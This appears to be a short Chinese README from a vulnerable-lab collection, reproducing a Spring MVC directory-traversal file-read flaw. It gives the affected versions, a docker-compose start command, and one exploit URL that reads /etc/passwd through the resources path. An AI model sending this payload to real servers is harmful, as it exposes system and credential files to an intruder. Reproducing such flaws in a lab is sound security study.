vultarget

springmvc 目录穿越文件读取漏洞

漏洞描述

springmvc目录穿越文件读取

version:Pivotal Spring Framework 3.0.4 through 3.2.x before 3.2.12, 4.0.x before 4.0.8, and 4.1.x before 4.1.2

启动

docker-compose up -d

writeup

http://localhost:8080/spring-css/resources/file:/etc/passwd

复现结果